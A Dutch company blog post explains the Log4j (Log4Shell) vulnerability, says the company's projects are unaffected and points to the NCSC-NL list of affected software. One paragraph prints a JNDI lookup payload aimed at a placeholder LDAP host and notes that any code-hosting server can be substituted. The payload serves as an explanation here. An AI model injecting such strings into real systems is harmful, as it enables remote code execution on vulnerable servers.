Afgelopen weekend is er een kritiek lek ontdekt in versie 2 van Apache Log4j software. Dat lek is kritisch omdat hierdoor het risico op misbruik groot is. We leggen je verderop in dit blog uit wat Log4j nu precies is en doet en waarom de paniek niet onterecht is. Maar laten we beginnen te zeggen dat dit lek voor onze klanten, en op alle Enrise projecten geen impact heeft.
Apache Log4j is een op Java gebaseerd hulpprogramma voor logboekregistratie, ook wel logging genoemd. Deze open source software is ooit als een soort hobby project begonnen en wordt ontwikkelt door een club programmeurs die dat op vrijwillige basis doen. Maar het succes is groot en veel grote softwarebedrijven maken gretig gebruik van deze gratis(!) software.
Wat valt er te misbruiken?
Met Log4j is het mogelijk om code op een server op afstand uit te voeren. Normaal gesproken is dit geen probleem, aangezien alleen bevoegde gebruikers Log4j gebruiken om bepaalde stukken code uit te voeren op de code. Het probleem zit bij Log4j zelf. Als er code wordt uitgevoerd door Log4j wordt dat geïnterpreteerd alsof het uitgevoerd wordt door code in de applicatie.
Als hacker kan je het volgende formaat gebruiken om code uit te voeren via Log4j: “${jndi:ldap://example.com/hack-me}”. De URL is te vervangen voor de URL van elke server waar code op kan staan. Met de code op de server kan je een andere server hacken die niet bestand is tegen Log4j.
Log4j zelf is niet het probleem, maar wel de manier hoe het gebruikt wordt. Alles wat er gelogd wordt kan misbruikt worden. Neem bijvoorbeeld een chat applicatie. Als alle berichten gelogd worden, kunnen alle chatberichten gebruikt wordt om de achterliggende server te hacken. Een ander voorbeeld kan zijn als bijvoorbeeld alle waarde van een formulier zoals een registratieformulier worden gelogd met Log4j.
Waar moet je nog meer op letten?
Naast applicaties en servers zijn er ook andere plekken waar Log4j gevaren oplevert. Denk bijvoorbeeld aan bepaalde merken routers zoals Unifi, die ook gebruik maken van Java en Log4j. Ook deze routers kunnen nu gehacked worden.
Het NCSC (Nationaal Cyber Security Centrum) verzamelt relevante info van deze kwetsbaarheid. Op deze pagina (https://github.com/NCSC-NL/log4shell) is een overzicht te vinden van de software die veilig en onveilig zijn bevonden voor Log4j.
Nog vragen? Neem gerust contact op.